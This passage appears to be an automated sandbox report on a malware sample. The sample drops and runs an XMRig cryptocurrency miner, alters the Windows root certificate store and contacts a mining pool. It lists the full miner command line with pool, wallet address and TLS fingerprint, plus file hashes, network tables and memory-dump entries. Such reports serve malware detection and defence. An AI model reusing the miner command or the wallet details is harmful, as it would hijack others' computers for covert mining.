60414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3740 wrote to memory of 2152 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3740 wrote to memory of 2152 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 131.253.33.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 237.33.253.131.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| BE | 23.41.178.74:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.178.41.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.133.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2152-14-0x0000014FDA700000-0x0000014FDA720000-memory.dmp
memory/2152-15-0x000001506CAC0000-0x000001506CAE0000-memory.dmp
memory/2152-16-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-17-0x000001506D120000-0x000001506D140000-memory.dmp
memory/2152-18-0x000001506D140000-0x000001506D160000-memory.dmp
memory/2152-19-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-20-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-23-0x000001506D140000-0x000001506D160000-memory.dmp
memory/2152-22-0x000001506D120000-0x000001506D140000-memory.dmp
memory/2152-21-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-24-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-25-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-26-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-27-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-28-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-29-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-30-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-31-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-32-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-33-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-34-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-35-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-36-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-37-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-38-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-39-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-40-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-41-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-42-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-43-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-44-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-45-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-46-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-47-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-48-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-49-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-50-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-51-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-52-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-53-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-54-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-55-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-56-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-57-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-58-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-59-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-60-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-61-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-62-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-63-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-64-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-65-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-66-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-67-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-68-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-69-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-70-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-71-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-72-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-73-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-74-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-75-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-76-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-77-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-78-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-79-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-80-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-81-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
memory/2152-82-0x00007FF79D510000-0x00007FF79E013000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 16:10
Platform
win10v2004-20240611-en
Max time kernel
1794s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1740 wrote to memory of 3496 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1740 wrote to memory of 3496 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| BE | 2.17.107.112:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 112.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3496-14-0x00000280CEBE0000-0x00000280CEC00000-memory.dmp
memory/3496-15-0x00000280D03E0000-0x00000280D0400000-memory.dmp
memory/3496-16-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-18-0x00000280D0420000-0x00000280D0440000-memory.dmp
memory/3496-17-0x00000280D0400000-0x00000280D0420000-memory.dmp
memory/3496-19-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-20-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-23-0x00000280D0420000-0x00000280D0440000-memory.dmp
memory/3496-22-0x00000280D0400000-0x00000280D0420000-memory.dmp
memory/3496-21-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-24-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-25-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-26-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-27-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-28-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-29-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-30-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-31-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-32-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-33-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-34-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-35-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-36-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-37-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-38-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-39-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-40-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-41-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-42-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-43-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-44-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-45-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-46-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-47-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-48-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-49-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-50-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-51-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-52-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-53-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-54-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-55-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-56-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
